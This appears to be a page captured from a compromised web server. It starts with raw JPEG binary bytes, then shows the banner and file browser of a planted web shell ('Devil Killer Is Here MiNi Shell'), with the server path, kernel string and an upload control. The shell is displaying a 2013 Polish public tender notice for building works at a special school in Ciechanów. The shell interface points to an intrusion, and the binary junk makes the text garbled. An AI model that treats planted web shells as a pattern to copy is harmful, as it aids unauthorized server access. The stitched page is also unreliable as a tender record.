JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130506/176820-N-2013.html

<p class="kh_header"><b>Ciechanów: Wykonanie robót budowlanych obejmujących: budowę nowego skrzydła budynku SOSW (Internatu), modernizację starego budynku SOSW(obecnego), budowę wielofunkcyjnego boiska ze sztuczną nawierzchnią oraz bezpiecznego placu zabaw, dróg dojazdowych, chodników i parkingów z podjazdami wraz zagospodarowaniem terenu oraz remont ogrodzenia zgodnie z planem zagospodarowania nieruchomości w ramach realizacji projektu pn. Poprawa stanu i wyposażenia infrastruktury edukacyjnej i socjalno-bytowej Specjalnego Ośrodka Szkolno-Wychowawczego w Ciechanowie realizowany w ramach RPO</b><br>
<b>Numer ogłoszenia: 176820 - 2013; data zamieszczenia: 06.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy , ul. Sienkiewicza 13, 06-400 Ciechanów, woj. mazowieckie, tel. 23 6722889, faks 23 6722889.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.soswciechanow.edu.pl  stciechanow.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych obejmujących: budowę nowego skrzydła budynku SOSW (Internatu), modernizację starego budynku SOSW(obecnego), budowę wielofunkcyjnego boiska ze sztuczną nawierzchnią oraz bezpiecznego placu zabaw, dróg dojazdowych, chodników i parkingów z podjazdami wraz zagospodarowaniem terenu oraz remont ogrodzenia zgodnie z planem zagospodarowania nieruchomości w ramach realizacji projektu pn. Poprawa stanu i wyposażenia infrastruktury edukacyjnej i socjalno-bytowej Specjalnego Ośrodka Szkolno-Wychowawczego w Ciechanowie realizowany w ramach RPO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie robót budowlanych obejmujących: budowę nowego skrzydła budynku SOSW (Internatu), modernizację starego budynku SOSW (obecnego), budowę wielofunkcyjnego boiska ze sztuczną nawierzchnią oraz bezpiecznego placu zabaw, dróg dojazdowych, chodników i parkingów z podjazdami wraz zagospodarowaniem terenu oraz remont ogrodzenia zgodnie z planem zagospodarowania nieruchomości
Zakres robót budowlanych obejmuje:
1. BUDOWĘ NOWEGO  SKRZYDŁA BUDNYNKU INTERNATU
Przygotowanie terenu pod budowę w tym prace geodezyjne
Prace ziemne
Wykopy pod fundamenty + zabezpieczenie wykopu ścianką berlińską
Prace budowlano-montażowe
Fundamenty - ławy, stopy, ściany fundamentowe
Izolacje fundamentów
Podłoże betonowe pod posadzki 
Roboty murarskie - ściany zewnętrzne 
Roboty murarskie - ścianki działowe
Kominy wentylacyjne
Konstrukcja żelbetowa budynku-słupy, podciągi, rygle w ścianach, schody
Konstrukcja żelbetowa budynku-stropy, wieńce i nadproża
Konstrukcje stalowe
Dach - konstrukcja i pokrycie 
Prace wykończeniowe
Tynki i gładzie gipsowe 
Okładziny ścian i malowanie
Sufity podwieszone
Balustrady i pochwyty ze stali nierdzewnej
Wyposażenie pomieszczeń sanitarnych (pochwyty, pojemniki, lustra)
Posadzki
Schody zewnętrzne
Stolarka drzwiowa
Stolarka okienna
Elewacja 
Winda, platformy dla nps, klapy oddymiające 
Mała architektura, zadaszenia, wycieraczki
Prace instalacyjne
Instalacje elektryczne wewnętrzne 
Instalacja c.o. i c.t.
Wentylacja i klimatyzacja
Instalacja wodociągowa
Instalacja kanalizacyjna

2. PRZEBUDOWĘ  INFRASTRUKTURY TECHNICZNEJ KOLIDUJĄCEJ Z INWESTYCJĄ 

Przyłącze wodociągowe
Sieć kanalizacji deszczowej
Przyłącze kanalizacji sanitarnej

3. REMONT ISTNIEJĄCEGO BUDYNKU SOSW
Termomodernizacja 
Docieplenie ścian zewnętrznych 
Wyprawa elewacyjna tynkarska i malowanie 
Okładziny ścian z płyt kamiennych
Obróbki blacharskie
Kapitalny remont istniejącego budynku SOSW
Roboty rozbiórkowe 
Roboty budowlane remontowe wewnętrzne - wykucia i zamurowania
Roboty budowlane remontowe zewnętrzne
Modernizacja pomieszczenia - węzeł cieplny
Stolarka okienna i drzwiowa - wymiana okien i drzwi na nowe PCV
Budowa instalacji odgromowej w istniejącej części budynku

4. BUDOWĘ  BOISKA WIELOFUNKCYJNEGO Z OGRODZENIEM, WYPOSAŻENIEM I BUDOWĘ PLACU ZABAW

Roboty ziemne
Wykonanie podbudowy boiska
Wykonanie warstwy nawierzchni poliuretanowej
Ogrodzenie boiska
Wyposażenie boiska w urządzenia do piłki ręcznej, siatkówki, koszykówki,  tenisa 
Wyposażenie placu zabaw 

5. BUDOWĘ DRÓG DOJAZDOWCH, CHODNIKÓW, PARKINGÓW Z PODJAZDAMI

Roboty rozbiórkowe
Wykonanie korytowania pod nawierzchnie z kostki
Podbudowa z kruszywa łamanego
Nawierzchnie z kostki - drogi, place, parkingi i chodniki
Roboty ziemne i wykończeniowe

6. MODERNIZACJĘ OGRODZENIA

Ogrodzenie - roboty rozbiórkowe
Ogrodzenie istniejące - naprawa 
Ogrodzenie - uzupełnienie starego + nowe fragmenty ogrodzenia

Teren objęty przedmiotem zamówienia jest na działce budowlanej nr 1715/15, 1715/14, 1702/11, 1702/5 w miejscowości Ciechanów, przy ul. Sienkiewicza 13. Powierzchnia terenu jest mało zróżnicowana. 
Obszar jest objęty ochroną konserwatora zabytków na podstawie miejscowego planu zagospodarowania przestrzennego. 
Zamawiający posiada pozwolenie na budowę.
2.Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 8 do SIWZ. zgodnie z art. 30 ust. 4 ustawy. 
3. Zamawiający dopuszcza rozwiązania równoważne inne niż opisane w dokumentacji projektowej i specyfikacjach  technicznych wykonania i odbioru robót budowlanych za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy.
4. Wykonawca zobowiązany będzie do wykonania wszelkich niezbędnych robót   przygotowawczych związanych z realizacją inwestycji w szczególności inwentaryzacji istniejącej zieleni, usunięcia jej lub zabezpieczenia zgodnie z postanowieniami zawartymi w odpowiednich decyzjach administracyjnych oraz przepisami obowiązującego prawa.
5. W przypadku gdy w dokumentacji którą określa Załącznik Nr 8 do SIWZ pojawią się wskazania znaków towarowych, patentów lub pochodzenia, należy rozumieć, zgodnie z art. 29 ust. 3 Ustawy, że jest to uzasadnione specyfiką przedmiotu zamówienia i zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń. 
W takich okolicznościach zamawiający dopuszcza możliwość składania w ofercie rozwiązań równoważnych, wskazując, iż minimalne wymagania jakim mają odpowiadać rozwiązania równoważne to wymagania nie gorsze od parametrów wskazanych w Dokumentacji określonej w Załączniku Nr 8 do SIWZ.
6. Zgodnie z art. 30 ust. 5 Ustawy wykonawca, który powołuje się na rozwiązania równoważne, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego zgodnie z pkt 3 - 5.
7. Zaleca się, aby wykonawca przeprowadził szczegółową wizję lokalną w terenie, celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy o udzielenie zamówienia publicznego. Każdy z wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji przedmiotowego zamówienia.
8. Zgodnie z dyspozycją zawartą w § 4 ust. 3 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.), jeśli w zamówieniu na roboty budowlane przyjęto zasadę wynagrodzenia ryczałtowego, dokumentacja może nie obejmować przedmiaru robót. 
9. W niniejszym przetargu przewidziano wynagrodzenie ryczałtowe, stąd załączony do SIWZ przedmiar robót pełni rolę pomocniczą. W świetle powyższego obowiązkiem wykonawcy jest uwzględnienie w cenie ryczałtowej wszystkich kosztów niezbędnych do wykonania przedmiotu zamówienia opisanego w punkcie VIII SIWZ, w tym wynikających z załączonej dokumentacji oraz wynikających z wizji lokalnej.
10. Wykonawca wykona w ramach wynagrodzenia ryczałtowego obsługę geodezyjną oraz sporządzi inwentaryzację geodezyjną powykonawczą, wraz z rejestracją map w Ośrodku Dokumentacji Geodezyjno -Kartograficznej w Ciechanowie ul. Wyzwolenia 10 a. 
11. Zamawiający wymaga od wykonawcy udzielenia gwarancji jakości na następujące okresy 
gwarancyjne:
1) minimum 5 letniej gwarancji jakości na wykonane roboty budowlane,
2) minimum 5 letniej gwarancji jakości na materiały wykorzystane do wykonania robót 
budowlanych.
12. W wykonaniu robót będących przedmiotem niniejszego zamówienia będą uczestniczyć osoby z uprawnieniami budowlanymi, wskazane w ofercie wykonawcy. Zmiana składu osobowego może nastąpić wyłącznie za uprzednią pisemną zgodą zamawiającego oraz pod warunkiem posiadania przez nowe osoby co najmniej takich samych uprawnień budowlanych. 
13. Pozwolenie na budowę wraz z dokumentacją zostanie przekazane wykonawcy po zawarciu umowy.
14. Obowiązki stron wynikające z realizacji przedmiotu zamówienia zawarto we wzorze umowy stanowiącym Załącznik Nr 7 do SIWZ.
15. Zamawiający dopuszcza zatrudnienie do realizacji przedmiotu zamówienia podwykonawców.
16.Specyfika prac związanych z wykonaniem robót budowlanych obejmujących: budowę nowego skrzydła budynku SOSW (Internatu), modernizację starego budynku SOSW(obecnego), budowę wielofunkcyjnego boiska ze sztuczną nawierzchnią oraz bezpiecznego placu zabaw, dróg dojazdowych, chodników i parkingów z podjazdami wraz zagospodarowaniem terenu oraz remont ogrodzenia zgodnie z planem zagospodarowania nieruchomości wymaga, aby były one realizowane przez wykonawców mających doświadczenie. Wynika to z obowiązku zapewnienia należytych standardów technicznych, bezpieczeństwa i ciągłości dostaw.
Jeżeli wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom,  zobowiązany jest wskazać w ofercie (Załącznika Nr 1 do SIWZ) części zamówienia, których wykonanie zamierza powierzyć podwykonawcom.
Termin wykonania całości zamówienia: od podpisania umowy do dnia 30 października 2014 r. w tym:
1) budowa nowego skrzydła budynku Internatu- stan surowy zamknięty w terminie od podpisania umowy do 30.10.2013 r. 
2) przebudowa infrastruktury  technicznej kolidującej z inwestycją - od podpisania umowy do 30.10.2013 r. 
3) wykonanie prac modernizacyjnych starego budynku (docieplenie, tynkowanie, malowanie, wymiana stolarki okiennej) - od podpisania umowy do 30.10.2013 r.
4)  wykonanie remontu ogrodzenia w terminie od 01.09.2013 do 30.10.2013 r. 
5) wykonanie instalacji i robót wewnątrz nowego budynku w terminie  01.01. 2014 r. do 30.04. 2014 r. 
6) wykonanie robót zewnętrznych wykończeniowych nowego skrzydła w terminie 01.04. 2014 r.  do  31.05 2014 r. 
7) budowa boiska wielofunkcyjnego i bezpiecznego placu zabaw w terminie 01.05. 2014 r,  -31.07 . 2014 r.
8)wykonaniu robót drogowych - chodników, parkingów, podjazdów  - w terminie 01.06 .2014 r. do 30.09. 2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.11.00.00-1, 45.31.21.00-8, 45.33.11.00-7, 45.10.00.00-8, 45.26.23.00-4, 45.26.25.22-6, 45.41.00.00-4, 45.32.00.00-6, 45.43.00.00-0, 45.42.10.00-4, 45.44.21.00-8, 45.45.00.00-6, 45.26.12.10-9, 45.32.10.00-3, 45.31.30.00-5, 45.26.20.00-1, 45.34.20.00-6, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składający ofertę jest zobowiązany wnieść wadium w wysokości: 300.000,00 zł. (słownie: trzysta tysięcy złotych 00/100).
2. Wadium może być wniesione w jednej lub kilku z poniższych form:
1)  pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo   kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  z  dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3. Wadium należy wnieść przed upływem terminu złożenia ofert.
4. W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić na rachunek bankowy zamawiającego  Polski Bank Spółdzielczy w Ciechanowie
nr 82 8213 0008 2001 0005 2810 0006.
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
5. Zaleca się, aby na przelewie umieścić informację: wadium w postępowaniu na Wykonanie robót budowlanych w Specjalnym Ośrodku Szkolno -Wykonawczym w Ciechanowie Nr sprawy SOSW-3431/5/2013</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych szczególnych wymagań. 
W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania działalności, zamawiający żąda następującego dokumentu - oświadczenie z art. 21 ust. 1 o spełnieniu warunków udziału w postępowaniu  wg   załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli wykonawcy wykażą, iż w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali roboty budowlane, które polegały na: budowie co najmniej  3 obiektów budowlanych, w tym dwa obiekty o wartości robót minimum 5 mln zł. brutto i jeden obiekt o wartości minimum 7 mln zł  brutto,  oraz wykonali min. 3 boiska wielofunkcyjne.
Za obiekt budowlany zamawiający uzna budynek wraz z instalacjami i urządzeniami technicznymi, w którym zostały wykonane m.in. następujące roboty budowlane i instalacyjne:
-	Prace ziemne
-	Prace budowlano-montażowe
-	Dach - konstrukcja i pokrycie
-	Prace wykończeniowe
-	Winda, platformy dla nps, klapy oddymiające
-	Mała architektura, zadaszenia, wycieraczki
-	Prace instalacyjne
-	Instalacje elektryczne wewnętrzne
-	Instalacja c.o. i c.t.
-	Wentylacja i klimatyzacja
-	Instalacja wodociągowa
-	Instalacja kanalizacyjna
-	Przyłącze wodociągowe
-	Sieć kanalizacji deszczowej
-	Przyłącze kanalizacji sanitarnej
-	Termomodernizacja
-	Docieplenie ścian zewnętrznych
-	Wyprawa elewacyjna tynkarska i malowanie
-	Okładziny ścian z płyt kamiennych
Boiska wielofunkcyjne mogą być przedmiotem odrębnych zamówień.

W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia, zamawiający żąda następujących dokumentów:  
wykazu wykonanych głównych robót budowlanych (niezbędnych do wykazania spełnienia warunku posiadania wiedzy i doświadczenia), w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenie dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone wg. załącznika Nr 4 do SIWZ.
Dowodami, o których mowa w pkt 2.2., są:	
1) poświadczenie;
2) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa  w pkt 1).
W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty wskazane
w wykazie, o którym mowa w pkt 2.2, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów.
Do dowodów, o których mowa powyżej ma zastosowanie przepis § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U.  z 2013, poz. 231).
W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie  12 miesięcy  od dnia wejścia w życie rozporządzenia  Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. z 2013 r. poz. 231), Wykonawca  w miejsce poświadczeń o których mowa wyżej może przedkładać  dokumenty potwierdzające należyte wykonanie  robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie  określone w § 1 ust. 1 pkt  2 rozporządzenia Prezesa  Rady Ministrów  z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych szczególnych wymagań 



W celu potwierdzenia spełnienia warunku dysponowania potencjałem technicznym, zamawiający żąda następującego dokumentu: 
- oświadczenie z art. 21 ust. 1 o spełnieniu warunków udziału w postępowaniu  wg   załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli wykonawca dysponuje osobami zdolnymi do wykonania zamówienia:
a) kierownik budowy posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, posiadający co najmniej  15-letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy, w tym przynajmniej przy realizacji dwóch obiektów budowlanych należących do jednej z następujących  klas PKOB: 1122, 1130, 1211, 1220, 1263;
b) dwóch kierowników robót posiadających uprawnienia budowlane bez ograniczeń  do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, posiadających co najmniej 10-letnie doświadczenie zawodowe w kierowaniu robotami (budową) w swojej specjalności, w tym przynajmniej przy realizacji dwóch obiektów budowlanych należących do jednej z klas PKOB : 1122, 1130, 1211, 1220, 1263;
Co najmniej jeden z kierowników robót wymienionych w lit. b),  posiada dodatkowo udokumentowaną, co najmniej 2 letnią praktyką zawodową na budowie przy zabytkach nieruchomych, o której mowa w  § 8 ust. 1 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich  i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań lub porzuconych zabytków oraz badań archeologicznych i poszukiwań zabytków ruchomych (Dz. U. z 2004 r. Nr 150, poz. 1579), oraz doświadczenie przy kierowaniu robotami budowlanymi na min. jednym obiekcie należącym do klasy PKOB 2411;
c) kierownik robót posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, posiadający co najmniej 5-letnie doświadczenie zawodowe w kierowaniu robotami (budową) w swojej specjalności, w tym przynajmniej przy realizacji jednego obiektu budowlanego, należącego do jednej z następujących  klas PKOB: 1122, 1130, 1211, 1220, 1263;
d) kierownik robót posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych   i elektroenergetycznych, posiadającego co najmniej 5-letnie doświadczenie zawodowe w kierowaniu robotami (budową) w swojej specjalności, w tym przynajmniej przy realizacji jednego obiektu budowlanego, należącego do jednej z następujących  klas PKOB: 1122, 1130, 1211, 1220, 1263;
e) jedna osoba do pełnienia funkcji kierownika robót drogowych posiadająca uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności drogowej i co najmniej    5-letnie doświadczenie zawodowe w kierowaniu robotami (budową) w swojej specjalności,
f) jedna osoba do pełnienia funkcji geodety, posiadająca wykształcenie wyższe z zakresu geodezji i kartografii i udokumentowaną co najmniej 5 letnią praktykę zawodową.
W celu potwierdzenia spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących dokumentów: 
1. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz  z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie  do dysponowania tymi osobami - z wykorzystaniem wzoru załącznik 5 do SIWZ;
2.	 oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - z wykorzystaniem wzoru - załącznik 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca:
a) posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż  6 milionów zł;
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 6 milionów złotych;  
UWAGA!
W przypadku wartości posiadanych środków finansowych wyrażonych w innej walucie, zamawiający, w celu oceny spełnienia ww. warunku, dokona przeliczenia tych wartości wg. kursu z dnia otwarcia ofert na podstawie Tabeli kursów średnich NBP publikowanych na stronie internetowej: http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx.
W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów:
1) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy  w wysokości niezbędnej do wykazania spełnienia warunku, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku gdy wykonawca wykazując spełnianie niniejszego warunku, polega na zdolnościach finansowych innych podmiotów, należy przedłożyć informację dotyczącą tych podmiotów.
